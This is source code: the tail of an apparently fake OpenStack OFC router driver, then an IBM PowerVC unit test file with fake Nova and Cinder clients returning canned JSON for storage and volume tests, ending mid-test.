# IP address should have a format of a.b.c.d/N
if ip_address != str(netaddr.IPNetwork(ip_address)):
raise Exception(_('(add_router_interface) '
'ip_address %s is not a valid format (a.b.c.d/N).')
% ip_address)
if self.autocheck:
if ofc_router_id not in self.ofc_router_dict:
raise Exception(_('(add_router_interface) '
'OFC router %s not found') % ofc_router_id)
if ofc_net_id not in self.ofc_network_dict:
raise Exception(_('(add_router_interface) '
'OFC network %s not found') % ofc_net_id)
# Check duplicate destination
self.ofc_router_inf_dict[if_id] = {'router_id': ofc_router_id,
'network_id': ofc_net_id,
'ip_address': ip_address,
'mac_address': mac_address}
LOG.debug(_('add_router_interface: SUCCEED (if_id=%s)'), if_id)
return if_id
@call_log.log
def update_router_interface(self, ofc_router_inf_id,
ip_address=None, mac_address=None):
if ofc_router_inf_id not in self.ofc_router_inf_dict:
if self.autocheck:
raise Exception(_('(delete_router_interface) '
'OFC router interface %s not found')
% ofc_router_inf_id)
self.ofc_router_inf_dict[ofc_router_inf_id] = {}
inf = self.ofc_router_inf_dict[ofc_router_inf_id]
if ip_address:
inf.update({'ip_address': ip_address})
if mac_address:
inf.update({'mac_address': mac_address})
LOG.debug(_('update_router_route: SUCCEED'))
@call_log.log
def delete_router_interface(self, ofc_router_inf_id):
if ofc_router_inf_id in self.ofc_router_inf_dict:
del self.ofc_router_inf_dict[ofc_router_inf_id]
else:
if self.autocheck:
raise Exception(_('(delete_router_interface) '
'OFC router interface %s not found')
% ofc_router_inf_id)
LOG.debug(_('delete_router_interface: SUCCEED'))
@call_log.log
def add_router_route(self, ofc_router_id, destination, nexthop):
route_id = "ofc-" + uuidutils.generate_uuid()[:-4]
# IP address format check
netaddr.IPNetwork(destination)
netaddr.IPAddress(nexthop)
if self.autocheck:
if ofc_router_id not in self.ofc_router_dict:
raise Exception(_('(add_router_route) OFC router %s not found')
% ofc_router_id)
# Check duplicate destination
if destination in [route['destination'] for route in
self.ofc_router_route_dict.values()]:
raise Exception(_('(add_router_route) '
'route to "%s" already exists') % destination)
self.ofc_router_route_dict[route_id] = {'router_id': ofc_router_id,
'destination': destination,
'nexthop': nexthop}
LOG.debug(_('add_router_route: SUCCEED (route_id=%s)'), route_id)
return route_id
@call_log.log
def delete_router_route(self, ofc_router_route_id):
if ofc_router_route_id in self.ofc_router_route_dict:
del self.ofc_router_route_dict[ofc_router_route_id]
else:
if self.autocheck:
raise Exception(_('(delete_router_route) OFC router route %s '
'not found') % ofc_router_route_id)
LOG.debug(_('delete_router_route: SUCCEED'))
@call_log.log
def list_router_routes(self, ofc_router_id):
if self.autocheck:
if ofc_router_id not in self.ofc_router_dict:
raise Exception(_('(delete_router) OFC router %s not found')
% ofc_router_id)
routes = [{'id': k,
'destination': v['destination'],
'nexthop': v['nexthop']}
for k, v in self.ofc_router_route_dict.items()
if v['router_id'] == ofc_router_id]
LOG.debug(_('list_router_routes: routes=%s'), routes)
return routes
|
|
# Copyright 2013 IBM Corp.
import sys
import eventlet
import mock
import testtools
from novaclient.tests.v1_1 import fakes as novafakes
from cinderclient.tests.v1 import fakes as cinderfakes
from novaclient.tests import utils
from powervc.common import utils as pvc_utils
from powervc.common.client.extensions import nova as ext_nova
from powervc.common.client.extensions import cinder as ext_cinder
from powervc.common.client import delegate
from powervc.common import config
from powervc.common.utils import SCGCache
from powervc.common.utils import VolumeCache
sys.modules['powervc.common.config'] = mock.MagicMock()
"""
This class similarly extend the current nova client test cases
and cinder client testcases to provide powervc specified
storage-connectivity-group, storage template and volume related testcases
To run the testcases, alternatively:
1. Right click the TestNovaClient.py --> Run As --> Python unit-test
or
2. Refer to this link for detail UT running information:
https://jazz04.rchland.ibm.com:9443/jazz/service/ +
com.ibm.team.workitem.common.internal.rest.IAttachmentRestService/ +
itemName/com.ibm.team.workitem.Attachment/67843
The UtilsRealTest connect to real PowerVC v1.2 and retrieve information.
This cases might be fail due to real environment unavailable, all other
fake testcases should be run successfully.
"""
class PVCFakeNovaClient(novafakes.FakeClient):
"""
This PVCFakeClient class extends the current nova FakeClient,
aiming to set the self.client variable to PVCFakeHTTPClient
"""
def __init__(self, *args, **kwargs):
novafakes.FakeClient.__init__(self, *args, **kwargs)
self.client = PVCFakeNovaHTTPClient(**kwargs)
class PVCFakeNovaHTTPClient(novafakes.FakeHTTPClient):
"""
This PVCFakeHTTPClient class extends the current nova FakeHTTPClient.
For all the HTTP requests in this class, it returns a fake json data
as specified beforehand instead of requesting to a real environment.
"""
def __init__(self, **kwargs):
novafakes.FakeHTTPClient.__init__(self, **kwargs)
def get_servers_detail(self, **kw):
return (200, {}, {
"servers": [
{
"OS-EXT-STS:task_state": "activating",
"addresses": {
"VLAN1": [
{
"version": 4,
"addr": "10.4.11.113",
"OS-EXT-IPS:type": "fixed"
}
]
},
"image": {
"id": "fd2a0fdc-fcda-45fc-b5dd-96b9d9e0aa4d",
"links": [
{
"href": "https://localhost/powervc/openstack/\
compute/2ec48b8ec30f4328bf95b8a5ad147c4b/\
images/fd2a0fdc-fcda-45fc-b5dd-96b9d9e0aa4d",
"rel": "bookmark"
}
]
},
"ephemeral_gb": 1,
"cpus": "1",
"flavor": {
"id": "726544ff-9f0a-41ad-8b26-e6575bfe8146",
"links": [
{
"href": "https://localhost/powervc/openstack/\
compute/2ec48b8ec30f4328bf95b8a5ad147c4b/\
flavors/726544ff-9f0a-41ad-8b26-e6575bfe8146",
"rel": "bookmark"
}
]
},
"user_id": "8a326a8c5a774022a1ec49f5692bc316",
"vcpu_mode": "shared",
"desired_compatibility_mode": "default",
"updated": "2013-09-04T07:09:33Z",
"memory_mode": "dedicated",
"key_name": None,
"min_memory_mb": 512,
"name": "hc-22",
"min_vcpus": "0.10",
"vcpus": "0.50",
"max_memory_mb": 4096,
"min_cpus": "1",
"links": [
{
"href": "https://localhost/powervc/openstack/\
compute/\
v2/2ec48b8ec30f4328bf95b8a5ad147c4b/servers/\
6e205d64-7651-42bf-9c8b-b0cb4208e813",
"rel": "self"
},
{
"href": "https://localhost/powervc/openstack/\
compute/\
2ec48b8ec30f4328bf95b8a5ad147c4b/servers/\
6e205d64-7651-42bf-9c8b-b0cb4208e813",
"rel": "bookmark"
}
],
"max_vcpus": "16.00",
"OS-EXT-STS:vm_state": "active",
"OS-EXT-SRV-ATTR:instance_name":
"nova-z3-9-5-125-55-00000075",
"OS-EXT-SRV-ATTR:host": "ngp01_03_vios_1",
"id": "6e205d64-7651-42bf-9c8b-b0cb4208e813",
"security_groups": [
{
"name": "default"
}
],
"OS-DCF:diskConfig": "MANUAL",
"health_status": {
"health_value": "UNKNOWN",
"unknown_reason":
"Unable to get related hypervisor data"
},
"accessIPv4": "",
"accessIPv6": "",
"progress": 0,
"OS-EXT-STS:power_state": 1,
"OS-EXT-AZ:availability_zone": "nova",
"metadata": {},
"status": "ACTIVE",
"hostId":
"db8f3c353837a52c3782b4d04a767b33bd7dfa72983b4ab9aef91cb0",
"cpu_utilization": 0,
"compliance_status": [
{
"status": "compliant",
"category": "resource.allocation"
}
],
"current_compatibility_mode": "POWER7",
"root_gb": 4,
"OS-EXT-SRV-ATTR:hypervisor_hostname":
"ngp01-03-vios-1.rtp.stglabs.ibm.com",
"created": "2013-09-04T07:08:31Z",
"tenant_id": "2ec48b8ec30f4328bf95b8a5ad147c4b",
"memory_mb": 512,
"max_cpus": "16"
},
{
"OS-EXT-STS:task_state": "activating",
"addresses": {
"VLAN1": [
{
"version": 4,
"addr": "10.4.11.112",
"OS-EXT-IPS:type": "fixed"
}
]
},
"image": {
"id": "fd2a0fdc-fcda-45fc-b5dd-96b9d9e0aa4d",
"links": [
{
"href": "https://localhost/powervc/openstack/\
compute/2ec48b8ec30f4328bf95b8a5ad147c4b/\
images/\
fd2a0fdc-fcda-45fc-b5dd-96b9d9e0aa4d",
"rel": "bookmark"
}
]
},
"ephemeral_gb": 1,
"cpus": "1",
"flavor": {
"id": "726544ff-9f0a-41ad-8b26-e6575bfe8146",
"links": [
{
"href": "https://localhost/powervc/openstack/\
compute/2ec48b8ec30f4328bf95b8a5ad147c4b/\
flavors/726544ff-9f0a-41ad-8b26-e6575bfe8146",
"rel": "bookmark"
}
]
},
"user_id": "8a326a8c5a774022a1ec49f5692bc316",
"vcpu_mode": "shared",
"desired_compatibility_mode": "default",
"updated": "2013-09-04T07:02:57Z",
"memory_mode": "dedicated",
"key_name": None,
"min_memory_mb": 512,
"name": "hc-11",
"min_vcpus": "0.10",
"vcpus": "0.50",
"max_memory_mb": 4096,
"min_cpus": "1",
"links": [
{
"href": "https://localhost/powervc/openstack/\
compute\
/v2/2ec48b8ec30f4328bf95b8a5ad147c4b/servers/\
2eab7ee2-62eb-4f31-8628-20f8b06df86a",
"rel": "self"
},
{
"href": "https://localhost/powervc/openstack/\
compute/2ec48b8ec30f4328bf95b8a5ad147c4b/\
servers/2eab7ee2-62eb-4f31-8628-20f8b06df86a",
"rel": "bookmark"
}
],
"max_vcpus": "16.00",
"OS-EXT-STS:vm_state": "active",
"OS-EXT-SRV-ATTR:instance_name":
"nova-z3-9-5-125-55-00000074",
"OS-EXT-SRV-ATTR:host": "ngp01_02_vios_1",
"id": "2eab7ee2-62eb-4f31-8628-20f8b06df86a",
"security_groups": [
{
"name": "default"
}
],
"OS-DCF:diskConfig": "MANUAL",
"health_status": {
"health_value": "UNKNOWN",
"unknown_reason":
"Unable to get related hypervisor data"
},
"accessIPv4": "",
"accessIPv6": "",
"progress": 0,
"OS-EXT-STS:power_state": 1,
"OS-EXT-AZ:availability_zone": "nova",
"metadata": {},
"status": "ACTIVE",
"hostId":
"a67be7805b2dccafc012b2225f59cbad7504e8716c0fd4631bb6af73",
"cpu_utilization": 0.02,
"compliance_status": [
{
"status": "compliant",
"category": "resource.allocation"
}
],
"current_compatibility_mode": "POWER7",
"root_gb": 4,
"OS-EXT-SRV-ATTR:hypervisor_hostname":
"ngp01-02-vios-1.rtp.stglabs.ibm.com",
"created": "2013-09-04T07:01:10Z",
"tenant_id": "2ec48b8ec30f4328bf95b8a5ad147c4b",
"memory_mb": 512,
"max_cpus": "16"
}
]
})
def get_storage_connectivity_groups_f4b541cb(
self, **kw):
"""
To get a fake detail storage_connectivity_group
"""
return (200, {}, {"storage_connectivity_group":
{
"auto_add_vios": True,
"fc_storage_access": False,
"display_name": "Auto-SCG for Registered SAN",
"vios_cluster":
{
"provider_id": "shared_v7000_1"
},
"host_list": [
{
"name": "ngp01_02_vios_1",
"vios_list": [
{
"lpar_id": 1,
"name": "10-F715A",
"id": "ngp01_02_vios_1##1"
}
]
},
{
"name": "ngp01_03_vios_1",
"vios_list": [
{
"lpar_id": 1,
"name": "10-F76CA",
"id": "ngp01_03_vios_1##1"
}
]
}
],
"created_at": "2013-08-23 14:56:11.787465",
"enabled": True,
"auto_defined": True,
"id": "f4b541cb"
}})
def get_storage_connectivity_groups_sdfb541cb_volumes(
self, **kw):
"""
To get a fake detail storage_connectivity_group
"""
return (200, {}, {
"volumes": [
{
"status": "available",
"display_name": "abcabc",
"attachments": [],
"availability_zone": "nova",
"bootable": False,
"created_at": "2013-08-30T07:22:20.729677",
"display_description": "None",
"volume_type": "shared_v7000_1-default",
"snapshot_id": "None",
"source_volid": "None",
"metadata": {},
"id": "ab41ee79-0f84-4f0d-976e-0aa122c8b89d",
"size": 1
},
{
"status": "in-use",
"display_name": "",
"attachments": [
{
"host_name": "None",
"device": "/dev/sda",
"server_id":
"103c1f3a-c2b2-4b90-80f8-cc2dd756b636",
"id": "2eab9958-16e1-4559-b3e6-e723360a4f27",
"volume_id":
"2eab9958-16e1-4559-b3e6-e723360a4f27"
}
],
"availability_zone": "nova",
"bootable": False,
"created_at": "2013-08-30T03:33:06.272849",
"os-vol-tenant-attr:tenant_id":
"2ec48b8ec30f4328bf95b8a5ad147c4b",
"display_description": "",
"os-vol-host-attr:host": "shared_v7000_1",
"health_status": {
"health_value": "OK"
},
"volume_type": "None",
"snapshot_id": "None",
"source_volid": "5f7c7d0d-b4e1-4ebc-80d4-4f1e8734f7e5",
"metadata": {
"instance_uuid":
"103c1f3a-c2b2-4b90-80f8-cc2dd756b636",
"is_boot_volume": "True"
},
"id": "2eab9958",
"size": 4
},
{
"status": "in-use",
"display_name": "",
"attachments": [
{
"host_name": "None",
"device": "/dev/sda",
"server_id":
"6a81591c-1671-43d1-b8c2-e0eb09cdab84",
"id": "6c21891a-ce09-4701-98d7-1c8d0c6872cf",
"volume_id": "6c21891a-ce09-4701-98d7-1c8d0c6872cf"
}
],
"availability_zone": "nova",
"bootable": False,
"created_at": "2013-08-30T03:32:30.922320",
"os-vol-tenant-attr:tenant_id":
"2ec48b8ec30f4328bf95b8a5ad147c4b",
"display_description": "",
"os-vol-host-attr:host": "shared_v7000_1",
"health_status": {
"health_value": "OK"
},
"volume_type": "None",
"snapshot_id": "None",
"source_volid": "5f7c7d0d-b4e1-4ebc-80d4-4f1e8734f7e5",
"metadata": {
"instance_uuid":
"6a81591c-1671-43d1-b8c2-e0eb09cdab84",
"is_boot_volume": "True"
},
"id": "6c21891a-ce09-4701-98d7-1c8d0c6872cf",
"size": 4
},
{
"status": "in-use",
"display_name": "",
"attachments": [
{
"host_name": "None",
"device": "/dev/sda",
"server_id":
"57625362-279c-4e02-bc9c-c6035904b2f1",
"id": "ff681131-9eab-4723-8261-6a80f8e3518d",
"volume_id": "ff681131-9eab-4723-8261-6a80f8e3518d"
}
],
"availability_zone": "nova",
"bootable": False,
"created_at": "2013-08-30T03:32:03.243339",
"os-vol-tenant-attr:tenant_id":
"2ec48b8ec30f4328bf95b8a5ad147c4b",
"display_description": "",
"os-vol-host-attr:host": "shared_v7000_1",
"health_status": {
"health_value": "OK"
},
"volume_type": "None",
"snapshot_id": "None",
"source_volid": "5f7c7d0d-b4e1-4ebc-80d4-4f1e8734f7e5",
"metadata": {
"instance_uuid":
"57625362-279c-4e02-bc9c-c6035904b2f1",
"is_boot_volume": "True"
},
"id": "ff681131-9eab-4723-8261-6a80f8e3518d",
"size": 4
}
]
})
def get_storage_connectivity_groups_sdfb541cb_volume_types(
self, **kw):
"""
To get a fake detail storage_connectivity_group
"""
return (200, {}, {
"volume-types": [
{
"extra_specs": {
"drivers:storage_pool": "P-NGP01-pool",
"capabilities:volume_backend_name": "shared_v7000_1",
"drivers:rsize": "-1"
},
"name": "shared_v7000_1-default",
"id": "6627888e-9f59-4996-8c22-5d528c3273f0"
},
{
"extra_specs": {},
"name": "dm-crypt",
"id": "a3ae95f6-4aab-4446-b1d2-0fc2f60a89bb"
},
{
"extra_specs": {},
"name": "LUKS",
"id": "291f81a2-591b-4164-b2b2-829abc935573"
}
]
})
def get_storage_connectivity_groups_f4b541cb_volumes(
self, **kw):
"""
To get a fake detail storage_connectivity_group
"""
return (200, {}, {
"volumes": [
{
"status": "available",
"display_name": "abcabc",
"attachments": [],
"availability_zone": "nova",
"bootable": False,
"created_at": "2013-08-30T07:22:20.729677",
"display_description": "None",
"volume_type": "shared_v7000_1-default",
"snapshot_id": "None",
"source_volid": "None",
"metadata": {},
"id": "ab41ee79-0f84-4f0d-976e-0aa122c8b89d",
"size": 1
},
{
"status": "in-use",
"display_name": "",
"attachments": [
{
"host_name": "None",
"device": "/dev/sda",
"server_id":
"103c1f3a-c2b2-4b90-80f8-cc2dd756b636",
"id": "2eab9958-16e1-4559-b3e6-e723360a4f27",
"volume_id":
"2eab9958-16e1-4559-b3e6-e723360a4f27"
}
],
"availability_zone": "nova",
"bootable": False,
"created_at": "2013-08-30T03:33:06.272849",
"os-vol-tenant-attr:tenant_id":
"2ec48b8ec30f4328bf95b8a5ad147c4b",
"display_description": "",
"os-vol-host-attr:host": "shared_v7000_1",
"health_status": {
"health_value": "OK"
},
"volume_type": "None",
"snapshot_id": "None",
"source_volid": "5f7c7d0d-b4e1-4ebc-80d4-4f1e8734f7e5",
"metadata": {
"instance_uuid":
"103c1f3a-c2b2-4b90-80f8-cc2dd756b636",
"is_boot_volume": "True"
},
"id": "2eab9958",
"size": 4
},
{
"status": "in-use",
"display_name": "",
"attachments": [
{
"host_name": "None",
"device": "/dev/sda",
"server_id":
"6a81591c-1671-43d1-b8c2-e0eb09cdab84",
"id": "6c21891a-ce09-4701-98d7-1c8d0c6872cf",
"volume_id": "6c21891a-ce09-4701-98d7-1c8d0c6872cf"
}
],
"availability_zone": "nova",
"bootable": False,
"created_at": "2013-08-30T03:32:30.922320",
"os-vol-tenant-attr:tenant_id":
"2ec48b8ec30f4328bf95b8a5ad147c4b",
"display_description": "",
"os-vol-host-attr:host": "shared_v7000_1",
"health_status": {
"health_value": "OK"
},
"volume_type": "None",
"snapshot_id": "None",
"source_volid": "5f7c7d0d-b4e1-4ebc-80d4-4f1e8734f7e5",
"metadata": {
"instance_uuid":
"6a81591c-1671-43d1-b8c2-e0eb09cdab84",
"is_boot_volume": "True"
},
"id": "6c21891a-ce09-4701-98d7-1c8d0c6872cf",
"size": 4
},
{
"status": "in-use",
"display_name": "",
"attachments": [
{
"host_name": "None",
"device": "/dev/sda",
"server_id":
"57625362-279c-4e02-bc9c-c6035904b2f1",
"id": "ff681131-9eab-4723-8261-6a80f8e3518d",
"volume_id": "ff681131-9eab-4723-8261-6a80f8e3518d"
}
],
"availability_zone": "nova",
"bootable": False,
"created_at": "2013-08-30T03:32:03.243339",
"os-vol-tenant-attr:tenant_id":
"2ec48b8ec30f4328bf95b8a5ad147c4b",
"display_description": "",
"os-vol-host-attr:host": "shared_v7000_1",
"health_status": {
"health_value": "OK"
},
"volume_type": "None",
"snapshot_id": "None",
"source_volid": "5f7c7d0d-b4e1-4ebc-80d4-4f1e8734f7e5",
"metadata": {
"instance_uuid":
"57625362-279c-4e02-bc9c-c6035904b2f1",
"is_boot_volume": "True"
},
"id": "ff681131-9eab-4723-8261-6a80f8e3518d",
"size": 4
}
]
})
def get_storage_connectivity_groups_f4b541cb_volume_types(
self, **kw):
"""
To get a fake detail storage_connectivity_group
"""
return (200, {}, {
"volume-types": [
{
"extra_specs": {
"drivers:storage_pool": "P-NGP01-pool",
"capabilities:volume_backend_name": "shared_v7000_1",
"drivers:rsize": "-1"
},
"name": "shared_v7000_1-default",
"id": "6627888e-9f59-4996-8c22-5d528c3273f0"
},
{
"extra_specs": {},
"name": "dm-crypt",
"id": "a3ae95f6-4aab-4446-b1d2-0fc2f60a89bb"
},
{
"extra_specs": {},
"name": "LUKS",
"id": "291f81a2-591b-4164-b2b2-829abc935573"
}
]
})
def get_storage_connectivity_groups(self, **kw):
"""
To return a fake storage_connectivity_groups
"""
return (200, {}, {"storage_connectivity_groups": [
{
"display_name": "Auto-SCG for Registered SAN",
"id": "f4b541cb"
},
{
"display_name": "SCG sample",
"id": "sdfb541cb"
}
]})
def get_storage_connectivity_groups_detail(self, **kw):
"""
To return a fake detail storage_connectivity_groups
"""
return (200, {}, {"storage_connectivity_groups": [
{
"auto_add_vios": True,
"fc_storage_access": True,
"display_name": "Auto-SCG for Registered SAN",
"host_list": [
{
"name": "ngp01_02_vios_1",
"vios_list": [
{
"lpar_id": 1,
"name": "10-F715A",
"id": "ngp01_02_vios_1##1"
}
]
},
{
"name": "ngp01_03_vios_1",
"vios_list": [
{
"lpar_id": 1,
"name": "10-F76CA",
"id": "ngp01_03_vios_1##1"
}
]
}
],
"created_at": "2013-08-23 14:56:11.787465",
"enabled": True,
"auto_defined": True,
"id": "f4b541cb"
},
{
"auto_add_vios": True,
"fc_storage_access": True,
"display_name": "SCG Sample",
"host_list": [
{
"name": "ngp01_02_vios_1",
"vios_list": [
{
"lpar_id": 1,
"name": "10-F715A",
"id": "ngp01_02_vios_1##1"
}
]
},
{
"name": "ngp01_03_vios_1",
"vios_list": [
{
"lpar_id": 1,
"name": "10-F76CA",
"id": "ngp01_03_vios_1##1"
}
]
}
],
"created_at": "2013-08-23 14:56:11.787465",
"enabled": True,
"auto_defined": True,
"id": "sdfb541cb"
}
]})
class PVCFakeCinderClient(cinderfakes.FakeClient):
"""
This PVCFakeClient class extends the current cinder FakeClient,
and pvccinderclient.CinderClient.
aiming to set the self client variable to PVCFakeHTTPClient
"""
def __init__(self, *args, **kwargs):
cinderfakes.FakeClient.__init__(self, *args, **kwargs)
self.client = PVCFakeCinderHTTPClient(**kwargs)
class PVCFakeCinderHTTPClient(cinderfakes.FakeHTTPClient):
"""
This PVCFakeHTTPClient class extends the current cinder FakeHTTPClient.
For all the HTTP requests in this class, it returns a fake json data
as specified beforehand instead of requesting to a real environment.
"""
def __init__(self, **kwargs):
cinderfakes.FakeHTTPClient.__init__(self, **kwargs)
#
# Volumes related
#
def get_volumes_2eab9958(self, **kw):
r = {'volume': self.get_volumes_detail()[2]['volumes'][0]}
return (200, {}, r)
def get_volumes_detail(self, **kw):
"""
Override the parent method to a powerVC specified volume data.
"""
return (200, {}, {
"volumes": [
{
"status": "available",
"display_name": "abcabc",
"attachments": [],
"availability_zone": "nova",
"bootable": False,
"created_at": "2013-08-30T07:22:20.729677",
"display_description": "None",
"volume_type": "shared_v7000_1-default",
"snapshot_id": "None",
"source_volid": "None",
"metadata": {},
"id": "ab41ee79-0f84-4f0d-976e-0aa122c8b89d",
"size": 1
},
{
"status": "in-use",
"display_name": "",
"attachments": [
{
"host_name": "None",
"device": "/dev/sda",
"server_id":
"103c1f3a-c2b2-4b90-80f8-cc2dd756b636",
"id": "2eab9958-16e1-4559-b3e6-e723360a4f27",
"volume_id":
"2eab9958-16e1-4559-b3e6-e723360a4f27"
}
],
"availability_zone": "nova",
"bootable": False,
"created_at": "2013-08-30T03:33:06.272849",
"os-vol-tenant-attr:tenant_id":
"2ec48b8ec30f4328bf95b8a5ad147c4b",
"display_description": "",
"os-vol-host-attr:host": "shared_v7000_1",
"health_status": {
"health_value": "OK"
},
"volume_type": "None",
"snapshot_id": "None",
"source_volid": "5f7c7d0d-b4e1-4ebc-80d4-4f1e8734f7e5",
"metadata": {
"instance_uuid":
"103c1f3a-c2b2-4b90-80f8-cc2dd756b636",
"is_boot_volume": "True"
},
"id": "2eab9958",
"size": 4
},
{
"status": "in-use",
"display_name": "",
"attachments": [
{
"host_name": "None",
"device": "/dev/sda",
"server_id":
"6a81591c-1671-43d1-b8c2-e0eb09cdab84",
"id": "6c21891a-ce09-4701-98d7-1c8d0c6872cf",
"volume_id": "6c21891a-ce09-4701-98d7-1c8d0c6872cf"
}
],
"availability_zone": "nova",
"bootable": False,
"created_at": "2013-08-30T03:32:30.922320",
"os-vol-tenant-attr:tenant_id":
"2ec48b8ec30f4328bf95b8a5ad147c4b",
"display_description": "",
"os-vol-host-attr:host": "shared_v7000_1",
"health_status": {
"health_value": "OK"
},
"volume_type": "None",
"snapshot_id": "None",
"source_volid": "5f7c7d0d-b4e1-4ebc-80d4-4f1e8734f7e5",
"metadata": {
"instance_uuid":
"6a81591c-1671-43d1-b8c2-e0eb09cdab84",
"is_boot_volume": "True"
},
"id": "6c21891a-ce09-4701-98d7-1c8d0c6872cf",
"size": 4
},
{
"status": "in-use",
"display_name": "",
"attachments": [
{
"host_name": "None",
"device": "/dev/sda",
"server_id":
"57625362-279c-4e02-bc9c-c6035904b2f1",
"id": "ff681131-9eab-4723-8261-6a80f8e3518d",
"volume_id": "ff681131-9eab-4723-8261-6a80f8e3518d"
}
],
"availability_zone": "nova",
"bootable": False,
"created_at": "2013-08-30T03:32:03.243339",
"os-vol-tenant-attr:tenant_id":
"2ec48b8ec30f4328bf95b8a5ad147c4b",
"display_description": "",
"os-vol-host-attr:host": "shared_v7000_1",
"health_status": {
"health_value": "OK"
},
"volume_type": "None",
"snapshot_id": "None",
"source_volid": "5f7c7d0d-b4e1-4ebc-80d4-4f1e8734f7e5",
"metadata": {
"instance_uuid":
"57625362-279c-4e02-bc9c-c6035904b2f1",
"is_boot_volume": "True"
},
"id": "ff681131-9eab-4723-8261-6a80f8e3518d",
"size": 4
}
]
})
def post_volumes_pvcvolume_action(self, body, **kw):
"""
Add this method to handle powerVC volume post actions
Here is the same logic as OpenStack one for example.
"""
_body = None
resp = 202
assert len(list(body.keys())) == 1
action = list(body.keys())[0]
if action == 'os-attach':
assert sorted(list(body[action])) == ['instance_uuid',
'mode',
'mountpoint']
elif action == 'os-detach':
assert body[action] is None
elif action == 'os-reserve':
assert body[action] is None
elif action == 'os-unreserve':
assert body[action] is None
elif action == 'os-initialize_connection':
assert list(body[action].keys()) == ['connector']
return (202, {}, {'connection_info': 'foos'})
elif action == 'os-terminate_connection':
assert list(body[action].keys()) == ['connector']
elif action == 'os-begin_detaching':
assert body[action] is None
elif action == 'os-roll_detaching':
assert body[action] is None
elif action == 'os-reset_status':
assert 'status' in body[action]
else:
raise AssertionError("Unexpected action: %s" % action)
return (resp, {}, _body)
#
# volume type related
#
def get_types(self, **kw):
return (200, {}, {
"volume_types": [
{
"extra_specs": {
"drivers:storage_pool": "P-NGP01-pool",
"capabilities:volume_backend_name": "shared_v7000_1",
"drivers:rsize": "-1"
},
"name": "shared_v7000_1-default",
"id": "6627888e-9f59-4996-8c22-5d528c3273f0"
},
{
"extra_specs": {},
"name": "dm-crypt",
"id": "a3ae95f6-4aab-4446-b1d2-0fc2f60a89bb"
},
{
"extra_specs": {},
"name": "LUKS",
"id": "291f81a2-591b-4164-b2b2-829abc935573"
}
]
})
def get_storage_providers_2(self, **kw):
"""
To get a fake detail storage_provider which id is 2
"""
return (200, {}, {"storage_provider":
{
"backend_type": "svc",
"volume_count": "null",
"service": {
"host_display_name": "shared_v7000_1",
"host": "shared_v7000_1",
"id": 4
},
"backend_id": "00000200A0204C30",
"health_status": {
"health_value": "OK"
},
"free_capacity_gb": 873.5,
"total_capacity_gb": 1115.5,
"storage_hostname": "shared_v7000_1",
"id": 2,
"backend_state": "running"
}})
def get_storage_providers_detail(self, **kw):
"""
To return a fake detail storage_providers
"""
return (200, {}, {"storage_providers": [
{
"backend_type": "svc",
"volume_count": "null",
"service": {
"host_display_name": "shared_v7000_1",
"host": "shared_v7000_1",
"id": 4
},
"backend_id": "00000200A0204C30",
"health_status": {
"health_value": "OK"
},
"free_capacity_gb": 873.5,
"total_capacity_gb": 1115.5,
"storage_hostname": "shared_v7000_1",
"id": 2,
"backend_state": "running",
"storage_type": "fc"
},
{
"backend_type": "fc",
"volume_count": "null",
"service": {
"host_display_name": "shared_v7000_1",
"host": "shared_v7000_1",
"id": 4
},
"backend_id": "00000200A0204C31",
"health_status": {
"health_value": "OK"
},
"free_capacity_gb": 73.5,
"total_capacity_gb": 115.5,
"storage_hostname": "shared_v7000_2",
"id": 3,
"backend_state": "running",
"storage_type": "fc"
}
]})
class FakeUtils(pvc_utils.Utils):
def __init__(self):
self._novaclient = None
self._cinderclient = None
self.scg_cache = None
class UtilsFakeTest(utils.TestCase):
"""
Testcases for utils.py in this class reads the storage connectivity
group, storage provider, storage template and volume from fake data.
All the cases in this class should be run successfully.
"""
def setUp(self):
super(UtilsFakeTest, self).setUp()
config.parse_power_config(['/etc/powervc/powervc.conf'], 'cinder')
self.utils = FakeUtils()
# get nova_client
nova_fakeclient = PVCFakeNovaClient('r', 'p', 's',
'http://localhost:5000/')
# delegate to nova extension class
nova_client = delegate.new_composite_deletgate(
[ext_nova.Client(nova_fakeclient), nova_fakeclient])
# get cinder client
cinder_fakeclient = PVCFakeCinderClient('r', 'p')
# delegate to nova extension class
cinder_client = delegate.new_composite_deletgate(
[ext_cinder.Client(cinder_fakeclient), cinder_fakeclient])
self.utils._novaclient = nova_client
self.utils._cinderclient = cinder_client
self.utils.scg_cache = SCGCache(nova_client)
self.scg_id_list = ['sdfb541cb',
'f4b541cb']
self.scg_name_list = ['Auto-SCG for Registered SAN',
'SCG Sample']
def test_get_multi_scg_accessible_storage_providers_1(self):
accessible_storage_providers = \
self.utils.get_multi_scg_accessible_storage_providers(
scg_uuid_list=self.scg_id_list,
scg_name_list=None)
self.assertEqual([provider.storage_hostname
for provider in accessible_storage_providers],
['shared_v7000_1', 'shared_v7000_2'])
def test_get_multi_scg_accessible_storage_providers_2(self):
accessible_storage_providers = \
self.utils.get_multi_scg_accessible_storage_providers(
scg_uuid_list=None,
scg_name_list=self.scg_name_list)
self.assertEqual([provider.id
for provider in accessible_storage_providers],
[2, 3])
def test_get_scg_accessible_storage_providers_1(self):
accessible_storage_providers = \
self.utils.get_scg_accessible_storage_providers(
"f4b541cb")
self.assertEqual(accessible_storage_providers[0].storage_hostname,
"shared_v7000_1")
def test_get_scg_accessible_storage_providers_2(self):
"""
Test when scg not specified
"""
accessible_storage_providers = \
self.utils.get_scg_accessible_storage_providers()
self.assertEqual(accessible_storage_providers[0].storage_hostname,
"shared_v7000_1")
def test_get_multi_scg_accessible_storage_templates_1(self):
accessible_storage_templates = \
self.utils.get_multi_scg_accessible_storage_templates(
scg_uuid_list=self.scg_id_list,
scg_name_list=None)
# Shoud return the storage template which in the accessible
# storage providers
self.assertEqual([st.name for st in accessible_storage_templates],
['dm-crypt', 'LUKS', 'shared_v7000_1-default'])
def test_get_multi_scg_accessible_storage_templates_2(self):
accessible_storage_templates = \
self.utils.get_multi_scg_accessible_storage_templates(
scg_uuid_list=None,
scg_name_list=self.scg_name_list)
# Shoud return the storage template which in the accessible
# storage providers
self.assertEqual([st.name for st in accessible_storage_templates],
['dm-crypt', 'LUKS', 'shared_v7000_1-default'])
def test_get_scg_accessible_storage_templates_1(self):
accessible_storage_templates = \
self.utils.get_scg_accessible_storage_templates(
"f4b541cb")
# Shoud return the storage template which in the accessible
# storage providers
self.assertEqual(accessible_storage_templates[0].name,
"shared_v7000_1-default")
def test_get_multi_scg_accessible_volumes_1(self):
scg_accessible_volumes = \
self.utils.get_multi_scg_accessible_volumes(
scg_uuid_list=self.scg_id_list,
scg_name_list=None)
# Shoud return the volume which in the accessible
# storage templates
